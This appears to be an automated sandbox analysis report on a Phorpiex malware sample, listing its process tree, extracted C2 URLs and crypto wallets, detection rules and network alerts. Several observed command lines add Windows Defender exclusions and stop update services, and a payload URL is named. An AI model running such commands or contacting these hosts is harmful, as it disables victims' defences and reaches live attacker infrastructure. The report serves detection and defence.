Windows Analysis Report
thcdVit1dX.exe

Overview

General Information

Sample name: thcdVit1dX.exe
renamed because original name is a hash value
Original sample name: 6b9670cd01edbc5d5f1aa015fd976155660f8a7227f2c1a8d5dc6eaa7fe9a772.exe
Analysis ID: 1542686
MD5: cbd0e8f0c0aefe122d41029c119624cf
SHA1: 8bfafcfb05c61d27d6bf114128a891d0799dd2bd
SHA256: 6b9670cd01edbc5d5f1aa015fd976155660f8a7227f2c1a8d5dc6eaa7fe9a772
Tags: exe, user-JAMESWT_MHT

Detection

Phorpiex
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Stop multiple services
Suricata IDS alerts for network traffic
Yara detected Phorpiex
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Changes security center settings (notifications, updates, antivirus, firewall)
Contains functionality to check if Internet connection is working
Contains functionality to detect sleep reduction / modifications
Drops executables to the windows directory (C:\Windows) and starts them
Found evasive API chain (may stop execution after checking mutex)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Stops critical windows services
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
PE file contains sections with non-standard names
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Uses the system / local time for branch decision (may execute only at specific dates)

Classification

  • System is w10x64
  • thcdVit1dX.exe (PID: 7256 cmdline: "C:\Users\user\Desktop\thcdVit1dX.exe" MD5: CBD0E8F0C0AEFE122D41029C119624CF)
    • 4BBF.exe (PID: 7348 cmdline: "C:\Users\user\AppData\Local\Temp\4BBF.exe" MD5: 8D8E6C7952A9DC7C0C73911C4DBC5518)
      • 71384504.exe (PID: 7464 cmdline: C:\Users\user\AppData\Local\Temp\71384504.exe MD5: 06560B5E92D704395BC6DAE58BC7E794)
        • sysppvrdnvs.exe (PID: 7488 cmdline: C:\Windows\sysppvrdnvs.exe MD5: 06560B5E92D704395BC6DAE58BC7E794)
          • cmd.exe (PID: 7568 cmdline: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 7660 cmdline: powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
              • WmiPrvSE.exe (PID: 7896 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
          • cmd.exe (PID: 7584 cmdline: "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • sc.exe (PID: 7668 cmdline: sc stop UsoSvc MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
            • sc.exe (PID: 7700 cmdline: sc stop WaaSMedicSvc MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
            • sc.exe (PID: 7748 cmdline: sc stop wuauserv MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
            • sc.exe (PID: 7784 cmdline: sc stop DoSvc MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
            • sc.exe (PID: 7808 cmdline: sc stop BITS /wait MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
          • 2355412914.exe (PID: 8144 cmdline: C:\Users\user\AppData\Local\Temp\2355412914.exe MD5: CB8420E681F68DB1BAD5ED24E7B22114)
            • cmd.exe (PID: 2316 cmdline: "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 1996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • reg.exe (PID: 3376 cmdline: reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
            • cmd.exe (PID: 3788 cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 5532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • schtasks.exe (PID: 1240 cmdline: schtasks /delete /f /tn "Windows Upgrade Manager" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • 2658326577.exe (PID: 1400 cmdline: C:\Users\user\AppData\Local\Temp\2658326577.exe MD5: 06560B5E92D704395BC6DAE58BC7E794)
  • sysppvrdnvs.exe (PID: 8108 cmdline: "C:\Windows\sysppvrdnvs.exe" MD5: 06560B5E92D704395BC6DAE58BC7E794)
  • cleanup
{"C2 url": ["http://185.215.113.66/", "http://91.202.233.141/"], "Wallet": ["15TssKwtjMtwy4vDLcLsQUZUD2B9f7eDjw85sBNVC5LRPPnC", "1BzmrjmKPKSR2hH5BeJySfiVA676E8DYaK", "lskaj7asu8rwp4p9kpdqebnqh6kzyuefzqjszyd5w", "ltc1qt0n3f0t7vz9k0mvcswk477shrxwjhf9sj5ykrp", "zil19delrukejtr306u0s7ludxrwk434jcl6ghpng3", "zncBgwqwqquPLHrM4ozrtr3LPyFuNVemy4v", "cro1xq0gkfldclds7y7fa2x6x25zu7ttnxxkjs66gf", "erd1hwcnscv0tldljl68upajgfqrcrmtznth4n6ee46le43cqpe5tatqw96dnx", "kava1r9xek0h0vkfra44lg3rp07teh9elxg2n6vsdzn", "inj1e2g9nyfjcnvgjpaa3czx2spgf2jx3gp4gk0nl9", "osmo125f3mw4xd9htpsq4zj5w5ezm5gags37y6pnhx3", "one1mnk7lk2506r0ewvr7zgwfuyt7ahvngwqedka3x", "3PMiLynrGVZ8oEqvoqC4hXD67B1WoALR4pc", "3ESHude8zUHksQg1h6hHmzY79BS36L91Yn", "DLUzwvyxN1RrwjByUPPzVMdfxNRPGVRMMA", "DsWwjQcpgo8AoFYvFnLrwFpcx8wgjSYLexe", "t1J6GCPCiHW1eRdjJgDDu6b1vSVmL5U7Twh", "terra1mw3dhwak2qe46drv4g7lvgwn79fzm8nr0htdq5", "thor1tdexg3v738xg9n289d6586frflkkcxxdgtauur", "tz1ZUNuZkWjdTt597axUcyZ5kFRtUZmUKuG2", "stars125f3mw4xd9htpsq4zj5w5ezm5gags37yxxh6mj", "stride125f3mw4xd9htpsq4zj5w5ezm5gags37y33qmy0", "sei125f3mw4xd9htpsq4zj5w5ezm5gags37ylk33kz", "sys1q0zg3clqajs04p2yhkgf96nf4hmup9mdr8l38u6", "bnb1msyt0djx4ecspfxg5en0ye465kg3kmv9utzml2", "bc1ppypcmu3684n648gyj62gjp2rw0xy7w3vwfamatlg29ajp4z52desafa0sr", "bc1qc9edl4hzl9jyt8twdad3zjeh2df2znq96tdezd", "btg1qwg85kf0r3885a82wtld053fy490lm2q2gemgpy", "ronin:a77fa3ea6e09a5f3fbfcb2a42fe21b5cf0ecdd17", "bitcoincash:qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r", "cosmos125f3mw4xd9htpsq4zj5w5ezm5gags37yj6q8sr", "addr1qxlwyj95fk9exqf55tdknx49e5443nr925tajatrdqpp8djla7u9jhswc3dk39se79f9zhwwq2ca95er3mylm48wyalqr62dmg", "nano_3p8stz4wqicgda1g3ifd48girzd5u74is8sdqq99tkuuz1b96wjwbc7yrmnb", "GBQJMXYXPRIWFMXIFJR35ZB7LRKMB4PHCIUAUFR3TKUL6RDBZVLZEUJ3", "Gcrx8cK7ffKLaPJwiYHQrgi6pFTLbJsBPV", "EQxXrZv7VQpoAA15kJ1XJyXVxT3yQSoNyM", "B62qpDfv86fUZc4ntrYJL6eFJZajjNKRcBuW5iPbcLNkiPekLkV8NdA", "BKyTYg4eZC9NCzcL8M3hcUmDhCnBJrSScH", "UQAbBKbfkiK3Gjo86zgD3yYO5Njf7zxPTEO4JLqN13ruoGDb"]}
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\2658326577.exe | JoeSecurity_Phorpiex_4 | Yara detected Phorpiex | Joe Security |
C:\Windows\sysppvrdnvs.exe | JoeSecurity_Phorpiex_4 | Yara detected Phorpiex | Joe Security |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\newtpp[1].exe | JoeSecurity_Phorpiex_4 | Yara detected Phorpiex | Joe Security |
C:\Users\user\AppData\Local\Temp\71384504.exe | JoeSecurity_Phorpiex_4 | Yara detected Phorpiex | Joe Security |

Source | Rule | Description | Author | Strings
00000003.00000002.2274629831.00000000007DE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Phorpiex_4 | Yara detected Phorpiex | Joe Security |
0000001A.00000002.2514348766.0000000000410000.00000002.00000001.01000000.0000000B.sdmp | JoeSecurity_Phorpiex_4 | Yara detected Phorpiex | Joe Security |
00000011.00000002.2413964057.0000000000410000.00000002.00000001.01000000.00000008.sdmp | JoeSecurity_Phorpiex_4 | Yara detected Phorpiex | Joe Security |
00000004.00000003.2473152957.0000000004B41000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Phorpiex_4 | Yara detected Phorpiex | Joe Security |
0000001A.00000000.2493732494.0000000000410000.00000002.00000001.01000000.0000000B.sdmp | JoeSecurity_Phorpiex_4 | Yara detected Phorpiex | Joe Security |

Source | Rule | Description | Author | Strings
4.0.sysppvrdnvs.exe.400000.0.unpack | JoeSecurity_Phorpiex_4 | Yara detected Phorpiex | Joe Security |
3.0.71384504.exe.400000.0.unpack | JoeSecurity_Phorpiex_4 | Yara detected Phorpiex | Joe Security |
17.0.sysppvrdnvs.exe.400000.0.unpack | JoeSecurity_Phorpiex_4 | Yara detected Phorpiex | Joe Security |
26.0.2658326577.exe.400000.0.unpack | JoeSecurity_Phorpiex_4 | Yara detected Phorpiex | Joe Security |
26.2.2658326577.exe.400000.0.unpack | JoeSecurity_Phorpiex_4 | Yara detected Phorpiex | Joe Security |

                              Operating System Destruction

Source: Process started; Author: Joe Security; Data: Command: "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait, CommandLine: "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\sysppvrdnvs.exe, ParentImage: C:\Windows\sysppvrdnvs.exe, ParentProcessId: 7488, ParentProcessName: sysppvrdnvs.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait, ProcessId: 7584, ProcessName: cmd.exe

                              System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE", CommandLine: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\sysppvrdnvs.exe, ParentImage: C:\Windows\sysppvrdnvs.exe, ParentProcessId: 7488, ParentProcessName: sysppvrdnvs.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE", ProcessId: 7568, ProcessName: cmd.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE", CommandLine: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\sysppvrdnvs.exe, ParentImage: C:\Windows\sysppvrdnvs.exe, ParentProcessId: 7488, ParentProcessName: sysppvrdnvs.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE", ProcessId: 7568, ProcessName: cmd.exe
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: C:\Windows\sysppvrdnvs.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\71384504.exe, ProcessId: 7464, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE", CommandLine: powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7568, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE", ProcessId: 7660, ProcessName: powershell.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-26T07:26:17.704902+0200 | 2022050 | 1 | A Network Trojan was detected | 185.215.113.66 | 80 | 192.168.2.5 | 49720 | TCP
2024-10-26T07:26:10.813025+0200 | 2022051 | 1 | A Network Trojan was detected | 185.215.113.66 | 80 | 192.168.2.5 | 49720 | TCP
2024-10-26T07:26:17.704809+0200 | 2019714 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49720 | 185.215.113.66 | 80 | TCP
2024-10-26T07:26:33.655013+0200 | 2044077 | 1 | A Network Trojan was detected | 192.168.2.5 | 65053 | 195.82.3.15 | 40500 | UDP
2024-10-26T07:26:38.654038+0200 | 2044077 | 1 | A Network Trojan was detected | 192.168.2.5 | 65053 | 2.184.189.189 | 40500 | UDP
2024-10-26T07:26:43.670932+0200 | 2044077 | 1 | A Network Trojan was detected | 192.168.2.5 | 65053 | 151.246.159.157 | 40500 | UDP
2024-10-26T07:26:48.687298+0200 | 2044077 | 1 | A Network Trojan was detected | 192.168.2.5 | 65053 | 2.180.10.247 | 40500 | UDP
2024-10-26T07:26:20.780864+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49721 | 185.215.113.66 | 80 | TCP
2024-10-26T07:26:25.627582+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49721 | 185.215.113.66 | 80 | TCP
2024-10-26T07:26:31.911590+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49771 | 185.215.113.66 | 80 | TCP
2024-10-26T07:26:33.827471+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49784 | 185.215.113.66 | 80 | TCP
2024-10-26T07:26:39.456586+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49812 | 185.215.113.66 | 80 | TCP
2024-10-26T07:26:41.389569+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49823 | 185.215.113.66 | 80 | TCP
2024-10-26T07:26:44.712858+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49841 | 91.202.233.141 | 80 | TCP
2024-10-26T07:26:48.393009+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49864 | 185.215.113.66 | 80 | TCP
2024-10-26T07:26:19.836764+0200 | 2856563 | 1 | A Network Trojan was detected | 192.168.2.5 | 54677 | 1.1.1.1 | 53 | UDP
2024-10-26T07:26:10.813025+0200 | 2837677 | 1 | A Network Trojan was detected | 185.215.113.66 | 80 | 192.168.2.5 | 49771 | TCP
2024-10-26T07:26:34.137114+0200 | 2837677 | 1 | A Network Trojan was detected | 185.215.113.66 | 80 | 192.168.2.5 | 49784 | TCP
2024-10-26T07:26:10.813025+0200 | 2853272 | 1 | A Network Trojan was detected | 185.215.113.66 | 80 | 192.168.2.5 | 49720 | TCP
2024-10-26T07:26:25.627582+0200 | 2853292 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49721 | 185.215.113.66 | 80 | TCP
2024-10-26T07:26:31.911590+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.5 | 49771 | 185.215.113.66 | 80 | TCP
2024-10-26T07:26:33.827471+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.5 | 49784 | 185.215.113.66 | 80 | TCP
2024-10-26T07:26:39.456586+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.5 | 49812 | 185.215.113.66 | 80 | TCP
2024-10-26T07:26:41.389569+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.5 | 49823 | 185.215.113.66 | 80 | TCP
2024-10-26T07:26:48.393009+0200 | 2848295 | 1 | A Network Trojan was detected | 192.168.2.5 | 49864 | 185.215.113.66 | 80 | TCP


                              AV Detection

Source: thcdVit1dX.exe | Avira: detected
Source: C:\Users\user\AppData\Local\Temp\2658326577.exe | Avira: detection malicious, Label: HEUR/AGEN.1315882
Source: C:\Windows\sysppvrdnvs.exe | Avira: detection malicious, Label: HEUR/AGEN.1315882
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\newtpp[1].exe | Avira: detection malicious, Label: HEUR/AGEN.1315882
Source: C:\Users\user\AppData\Local\Temp\71384504.exe | Avira: detection malicious, Label: HEUR/AGEN.1315882
Source: 26.0.2658326577.exe.400000.0.unpack | Malware Configuration Extractor: Phorpiex {"C2 url": ["http://185.215.113.66/", "http://91.202.233.141/"], "Wallet": ["15TssKwtjMtwy4vDLcLsQUZUD2B9f7eDjw85sBNVC5LRPPnC", "1BzmrjmKPKSR2hH5BeJySfiVA676E8DYaK", "lskaj7asu8rwp4p9kpdqebnqh6kzyuefzqjszyd5w", "ltc1qt0n3f0t7vz9k0mvcswk477shrxwjhf9sj5ykrp", "zil19delrukejtr306u0s7ludxrwk434jcl6ghpng3", "zncBgwqwqquPLHrM4ozrtr3LPyFuNVemy4v", "cro1xq0gkfldclds7y7fa2x6x25zu7ttnxxkjs66gf", "erd1hwcnscv0tldljl68upajgfqrcrmtznth4n6ee46le43cqpe5tatqw96dnx", "kava1r9xek0h0vkfra44lg3rp07teh9elxg2n6vsdzn", "inj1e2g9nyfjcnvgjpaa3czx2spgf2jx3gp4gk0nl9", "osmo125f3mw4xd9htpsq4zj5w5ezm5gags37y6pnhx3", "one1mnk7lk2506r0ewvr7zgwfuyt7ahvngwqedka3x", "3PMiLynrGVZ8oEqvoqC4hXD67B1WoALR4pc", "3ESHude8zUHksQg1h6hHmzY79BS36L91Yn", "DLUzwvyxN1RrwjByUPPzVMdfxNRPGVRMMA", "DsWwjQcpgo8AoFYvFnLrwFpcx8wgjSYLexe", "t1J6GCPCiHW1eRdjJgDDu6b1vSVmL5U7Twh", "terra1mw3dhwak2qe46drv4g7lvgwn79fzm8nr0htdq5", "thor1tdexg3v738xg9n289d6586frflkkcxxdgtauur", "tz1ZUNuZkWjdTt597axUcyZ5kFRtUZmUKuG2", "stars125f3mw4xd9htpsq4zj5w5ezm5gags37yxxh6mj", "stride125f3mw4xd9htpsq4zj5w5ezm5gags37y33qmy0", "sei125f3mw4xd9htpsq4zj5w5ezm5gags37ylk33kz", "sys1q0zg3clqajs04p2yhkgf96nf4hmup9mdr8l38u6", "bnb1msyt0djx4ecspfxg5en0ye465kg3kmv9utzml2", "bc1ppypcmu3684n648gyj62gjp2rw0xy7w3vwfamatlg29ajp4z52desafa0sr", "bc1qc9edl4hzl9jyt8twdad3zjeh2df2znq96tdezd", "btg1qwg85kf0r3885a82wtld053fy490lm2q2gemgpy", "ronin:a77fa3ea6e09a5f3fbfcb2a42fe21b5cf0ecdd17", "bitcoincash:qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r", "cosmos125f3mw4xd9htpsq4zj5w5ezm5gags37yj6q8sr", "addr1qxlwyj95fk9exqf55tdknx49e5443nr925tajatrdqpp8djla7u9jhswc3dk39se79f9zhwwq2ca95er3mylm48wyalqr62dmg", "nano_3p8stz4wqicgda1g3ifd48girzd5u74is8sdqq99tkuuz1b96wjwbc7yrmnb", "GBQJMXYXPRIWFMXIFJR35ZB7LRKMB4PHCIUAUFR3TKUL6RDBZVLZEUJ3", "Gcrx8cK7ffKLaPJwiYHQrgi6pFTLbJsBPV", "EQxXrZv7VQpoAA15kJ1XJyXVxT3yQSoNyM", "B62qpDfv86fUZc4ntrYJL6eFJZajjNKRcBuW5iPbcLNkiPekLkV8NdA", "BKyTYg4eZC9NCzcL8M3hcUmDhCnBJrSScH", "UQAbBKbfkiK3Gjo86zgD3yYO5Njf7zxPTEO4JLqN13ruoGDb"]}
Source: twizt.net | Virustotal: Detection: 19%
Source: http://185.215.113.66/pei.exe | Virustotal: Detection: 16%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\newtpp[1].exe | ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\pei[1].exe | ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Local\Temp\2355412914.exe | ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\2658326577.exe | ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Temp\4BBF.exe | ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Local\Temp\71384504.exe | ReversingLabs: Detection: 81%
Source: C:\Windows\sysppvrdnvs.exe | ReversingLabs: Detection: 81%
Source: thcdVit1dX.exe | ReversingLabs: Detection: 65%
Source: thcdVit1dX.exe | Virustotal: Detection: 61%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.8% probability
Source: C:\Users\user\AppData\Local\Temp\2658326577.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\2355412914.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\pei[1].exe | Joe Sandbox ML: detected
Source: C:\Windows\sysppvrdnvs.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\newtpp[1].exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\71384504.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\4BBF.exe | Joe Sandbox ML: detected
Source: thcdVit1dX.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Code function: 0_2_00465284 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,ReadFile,GetLastError,CryptDestroyHash,CryptReleaseContext,GetLastError,CryptGetHashParam,GetLastError,SetFilePointerEx,GetLastError,0_2_00465284
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Code function: 0_2_0041D96C DecryptFileW,0_2_0041D96C
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Code function: 0_2_0041C9B3 CreateFileW,GetLastError,DecryptFileW,CloseHandle,0_2_0041C9B3
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Code function: 0_2_0041CB34 CreateFileW,GetLastError,DecryptFileW,CloseHandle,0_2_0041CB34
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Code function: 0_2_0041DC5C ConvertStringSecurityDescriptorToSecurityDescriptorW,GetLastError,DecryptFileW,LocalFree,0_2_0041DC5C
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Code function: 0_2_0041DC0A DecryptFileW,0_2_0041DC0A
Source: C:\Users\user\AppData\Local\Temp\71384504.exe | Code function: 3_2_0040C830 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,3_2_0040C830
Source: C:\Windows\sysppvrdnvs.exe | Code function: 4_2_0040C830 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,4_2_0040C830
Source: C:\Windows\sysppvrdnvs.exe | Code function: 17_2_0040C830 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,17_2_0040C830

                              Phishing

Source: Yara match | File source: 4.0.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.71384504.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.0.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.0.2658326577.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.2.2658326577.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.71384504.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.2274629831.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000002.2514348766.0000000000410000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.2413964057.0000000000410000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.2473152957.0000000004B41000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
